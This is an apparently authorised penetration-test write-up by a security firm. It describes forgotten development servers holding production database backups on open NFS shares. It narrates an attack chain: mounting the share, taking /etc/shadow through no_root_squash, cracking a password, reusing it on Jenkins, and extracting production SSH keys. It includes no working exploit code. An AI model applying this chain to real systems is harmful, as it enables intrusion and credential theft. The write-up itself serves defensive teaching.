> root@dev-legacy:~# ls /backups/prod/ | wc -l && echo 'backup files found'<span class="cursor-blink">_</span>_
Every organisation has ghosts on its network. Servers that were built for a project that ended two years ago. Virtual machines spun up for a proof of concept that was never approved. Development environments created by a contractor who left the company before documenting what they had built. Test databases populated with production data because it was easier than generating synthetic records.
These systems accumulate like sediment. They are not in the asset register because they were never formally commissioned. They are not in the patching cycle because nobody knows they exist. They are not monitored because they were never enrolled in the SIEM. They are not backed up because they are not production systems. They are not decommissioned because nobody remembers they are there.
And then, one Tuesday afternoon, a penetration tester finds one. It is running an unpatched operating system, it is accessible from the user VLAN, and it contains a complete copy of the production database — customer names, addresses, financial records, and hashed passwords. All of them.
This is that story.
The client was an e-commerce company with a significant online presence — processing several million transactions per year across multiple brands. They operated a hybrid infrastructure: customer-facing applications hosted in a public cloud environment, with back-office systems, databases, and internal tooling running on-premises in a collocated data centre. The IT team comprised approximately forty people, including a dedicated development team of twelve.
We had been engaged to conduct an internal network penetration test focused on the on-premises environment. The scope covered all internal VLANs reachable from the user network, including server, development, and management segments. The client was particularly interested in the security of their database infrastructure, as they were preparing for a PCI DSS reassessment and wanted assurance that their cardholder data environment was properly isolated.
They provided us with a network diagram and an asset register. Both documents would prove to be incomplete.
Our initial scan of the internal network produced a host count that did not match the asset register. The register listed one hundred and forty-seven servers across all VLANs. Our scan identified one hundred and sixty-three. Sixteen unregistered hosts — a discrepancy of approximately eleven per cent.
Discrepancies between asset registers and reality are common on penetration tests. They typically represent a mix of temporary systems, forgotten test infrastructure, and devices added outside the change management process. But the scale of this discrepancy — sixteen hosts — suggested a more systemic issue.
We catalogued the unregistered hosts by VLAN.
Nine of the sixteen unregistered hosts were on the development VLAN. This VLAN was described in the client's documentation as a 'sandbox environment for application development and testing'. It was routable from the user VLAN — developers needed access to their test systems from their workstations. Firewall rules between the user VLAN and the development VLAN were permissive: all TCP and UDP ports were allowed in both directions.
The development VLAN was, in the client's own words, 'not production' and therefore subject to less rigorous controls. This distinction — between production and non-production — would prove to be the central weakness of the entire engagement.
We turned our attention to the development VLAN at 10.0.5.0/24. Of the thirty-one hosts present (twenty-two registered, nine unregistered), the registered systems were running a mix of Linux and Windows, hosting development instances of the company's web applications, CI/CD pipeline tools, and staging databases.
The nine unregistered hosts presented a very different profile.
Seven of nine unregistered hosts were running end-of-life operating systems — Ubuntu 16.04, Ubuntu 18.04, CentOS 7, and Windows Server 2012 R2. None were receiving security patches. All were running outdated application software. Several were running services with known critical vulnerabilities.
These were the ghosts. Development servers built for projects that had ended, proofs of concept that had served their purpose, and test environments that had been superseded by newer infrastructure. Nobody had decommissioned them because nobody owned them. They had been built by developers who had moved on, by contractors whose engagements had ended, and by IT staff who had changed roles. The machines ran on, quietly consuming IP addresses and electricity, invisible to every management process the organisation operated.
We examined each of the unregistered hosts systematically, but one device commanded our attention more than the others: 10.0.5.208 — an Ubuntu 18.04 server running MySQL 5.7, SSH, and NFS.
The NFS service was the immediate point of interest. NFS (Network File System) is a protocol for sharing filesystems across a network. When misconfigured — particularly when exports are shared with overly broad access permissions — NFS can expose sensitive data to any host on the network.
Two NFS exports, both shared with everyone — no IP-based access restrictions, no authentication, no encryption. We mounted the /backups share and discovered a directory structure that immediately raised the severity of the finding.
A directory named prod. On a development server. In an unregistered, unmanaged, unmonitored system.
Forty-three gigabytes of production database backups. Monthly exports of the e-commerce database, the CRM system, the user authentication database, and the analytics data warehouse. The files spanned six months, from August 2023 to February 2024. A cron job script on the server revealed the origin: a developer named D. Kumar had created an automated process that connected to the production database server each month, performed a full export, and stored the result on this development server.
The purpose, as noted in the script's comments, was a 'dev data refresh' — populating the development environment with realistic data for testing. This is an extremely common practice in software development. It is also one of the most dangerous, because it places production data — with all its sensitivity, all its regulatory obligations, and all its commercial value — on infrastructure that was never designed to protect it.
An unregistered, unpatched development server contained 43.8 GB of production database backups including customer PII, financial transaction records, authentication credentials, and CRM data. The data was accessible without authentication via NFS exports shared with all hosts on the network.
We decompressed and examined the most recent backup of each database — not to exfiltrate or copy the data, but to characterise its contents and sensitivity for accurate reporting. The scope of our access was confirmed through selective examination of table structures and limited record sampling.
| Database | Size | Contents | Sensitivity |
|---|---|---|---|
| ecommerce_db | 4.7 GB | Customer orders, delivery addresses, transaction history, product catalogue, pricing | PII, commercial — PCI DSS scope if card data present |
| crm_full | 1.9 GB | Customer contact records, support tickets, account notes, communication preferences | PII — GDPR Article 5 obligations apply |
| user_auth_db | 890 MB | Usernames, email addresses, bcrypt password hashes, MFA seeds, session tokens, API keys | Authentication credentials — critical security impact |
| analytics_warehouse | 12 GB | Aggregated transaction data, customer segmentation, marketing analytics, revenue reporting | Commercial — competitive intelligence value |
The user_auth_db backup was the most immediately dangerous. It contained bcrypt-hashed passwords for every customer account on the platform — over two million records. Bcrypt is a strong hashing algorithm, and the hashes would resist bulk cracking. However, the database also contained MFA seeds — the shared secrets used to generate time-based one-time passwords for customers who had enabled two-factor authentication. With the password hash and the MFA seed, an attacker who cracked a customer's password would also be able to generate valid MFA codes, completely defeating the two-factor protection.
The database also contained active API keys for integrations with payment processors, logistics providers, and marketing platforms. These keys were stored alongside their associated service account credentials. Several of the API keys, when tested against the providers' public endpoints, were still valid.
The e-commerce database contained customer names, email addresses, delivery addresses, phone numbers, and full order histories. A sampling of the data confirmed that it did not contain primary account numbers (PANs) or full card data — the payment processing was handled by a third-party tokenisation service, and only token references were stored. This was a positive finding from a PCI DSS perspective, but the volume of PII remained a significant GDPR concern.
The NFS share had given us access to the backup data directly, but we also needed to assess the server itself as a potential pivot point. The SSH service on 10.0.5.208 was running on the default port. We examined the backup script for credentials.
Hardcoded plaintext credentials for three production database servers — the e-commerce database, the CRM database, and the authentication database. The credentials followed a predictable pattern: Bkup_[Service]_2023! — the kind of password that is generated once, pasted into a script, and never changed.
We tested these credentials against the production database servers. The backup_svc accounts were still active on all three servers. The passwords had not been rotated since creation. The accounts had SELECT permissions on all databases — sufficient to read every table, every row, and every column in the production environment.
The forgotten development server had not only stored a copy of the crown jewels — it had stored the keys to the vault as well.
We also explored the SSH access on the development server itself. The server's /etc/shadow file was readable from the NFS export of /var/www — the export permissions were set to allow root access without squashing, meaning our NFS client could access files as root on the remote filesystem.
The no_root_squash option on the NFS exports meant that a remote client connecting as root could access any file on the server as root — including /etc/shadow. We cracked the password for the d.kumar account: Summer2023!.
D. Kumar was a developer who had left the company four months prior. His Active Directory account had been disabled as part of the standard leaver process. However, his local Linux account on the development server remained active — because the server was not in the asset register, it was not included in the leaver process, and nobody knew it existed.
We tested the cracked password against other services. Password reuse delivered the expected result: D. Kumar had used the same password for his local Linux account, his GitLab CE account on 10.0.5.207, and — critically — his Jenkins account on 10.0.5.203.
Jenkins on 10.0.5.203 was running version 2.249 — over three years behind the current release, with multiple known critical vulnerabilities. D. Kumar's account had administrative access. Jenkins' credential store contained stored SSH keys and passwords used by the CI/CD pipeline to deploy code to staging and production servers. Among these was an SSH private key for a service account with sudo access on production web servers.
From a forgotten development server to production infrastructure access. The credentials had been sitting in Jenkins for over a year, waiting for someone to find them.
| Step | Action | Weakness Exploited |
|---|---|---|
| 01 | Identified 16 unregistered hosts across internal VLANs | Incomplete asset register; no automated discovery |
| 02 | Enumerated 9 unmanaged servers on development VLAN | Development VLAN treated as low-risk; permissive firewall rules |
| 03 | Mounted NFS exports from 10.0.5.208 — no authentication | NFS exports shared with everyone; no IP restrictions |
| 04 | Discovered 43.8 GB of production database backups | Production data copied to unmanaged dev server for testing |
| 05 | Extracted production database credentials from backup script | Hardcoded plaintext credentials in shell script on NFS share |
| 06 | Confirmed credentials still valid on production database servers | No password rotation; service accounts unchanged since creation |
| 07 | Extracted /etc/shadow via NFS no_root_squash; cracked d.kumar | NFS misconfiguration; weak password; departed employee account active |
| 08 | Password reuse to Jenkins; extracted SSH keys for production servers | Password reuse; Jenkins credential store with production deployment keys |
This engagement exposed two interconnected problems that are endemic in organisations with active development teams: shadow infrastructure and the proliferation of production data into non-production environments.
The client's production database servers were well-managed. They were patched, monitored, backed up, and protected by network segmentation and access controls. The PCI DSS cardholder data environment was properly isolated. If the engagement had been scoped only to production systems, the findings would have been minimal.
But the copy of the production data on the development server was subject to none of these controls. The NFS share had no authentication. The server had no patches. The backup script had plaintext credentials. And the data — customer records, authentication hashes, API keys — was identical to what resided in the protected production environment.
Protecting the production database is necessary. It is not sufficient if a complete copy exists on an unmanaged server accessible from the entire network.
The most urgent action was isolating the unregistered servers and destroying the production data. The backup files on 10.0.5.208 constituted a data breach waiting to happen — two million customer records, accessible without authentication, on an unpatched server reachable from the user network.
Data masking and anonymisation must replace production data copies for development use. Tools and frameworks exist that can generate realistic test data from production schemas without exposing actual customer records. Where production data must be used in testing — for example, to reproduce specific bugs — it should be accessed in a controlled, time-limited, audited manner within a hardened staging environment, not copied to unmanaged servers via cron jobs.
Secrets management platforms such as HashiCorp Vault eliminate the need for hardcoded credentials in scripts and CI/CD configurations. Credentials are retrieved at runtime from a centralised vault, with short-lived leases and automatic rotation. This removes the risk of plaintext credentials persisting on filesystems indefinitely.
The leaver process must be extended beyond Active Directory. When an employee departs, their access must be revoked across all systems — including local Linux accounts, CI/CD platforms, source code repositories, cloud consoles, and any other system where they hold credentials. This requires a comprehensive access register that goes beyond the corporate directory, which in turn requires that those systems are known and documented.
Finally, automated asset discovery must run continuously. A weekly network scan that compares live hosts against the asset register and alerts on discrepancies would have identified these servers within days of their creation. The technology is straightforward — the challenge is operational: ensuring that alerts are investigated, unregistered hosts are assessed, and ghost infrastructure is either formally adopted or decommissioned.
The client's production environment was well-defended. Their databases were patched, monitored, and access-controlled. Their PCI DSS controls were effective. Their GDPR compliance programme was active and resourced. On paper, the data was protected.
But a copy of that data — every customer record, every password hash, every API key — sat on an unmanaged server in a forgotten corner of the development VLAN, accessible to anyone who could mount an NFS share. The data did not care that the server was labelled 'development'. The data was real. The exposure was real. The regulatory consequences, had this been discovered by an attacker rather than a penetration tester, would have been very real indeed.
Asset management is not an exciting topic. It does not make headlines. It does not feature in conference keynotes. But it is the foundation upon which every other security control depends. You cannot patch a server you do not know exists. You cannot monitor a system that is not in your SIEM. You cannot protect data that has been copied to a place you have never looked.
Until next time — stay sharp, stay curious, and count your servers. Then count them again.
This article describes a penetration test conducted under formal engagement with full written authorisation from the client. All identifying details have been altered or omitted to preserve client confidentiality. No customer data was exfiltrated or copied from the environment. Data sensitivity was assessed through schema analysis and limited record sampling only. Unauthorised access to computer systems is a criminal offence under the Computer Misuse Act 1990 and equivalent legislation worldwide. Do not attempt to replicate these techniques without proper authorisation.
Hedgehog Security finds the servers your asset register missed — the ghost infrastructure, the forgotten development environments, and the production data that has migrated to places it should never be. If your development environment has not been assessed alongside your production systems, you are only seeing half the picture.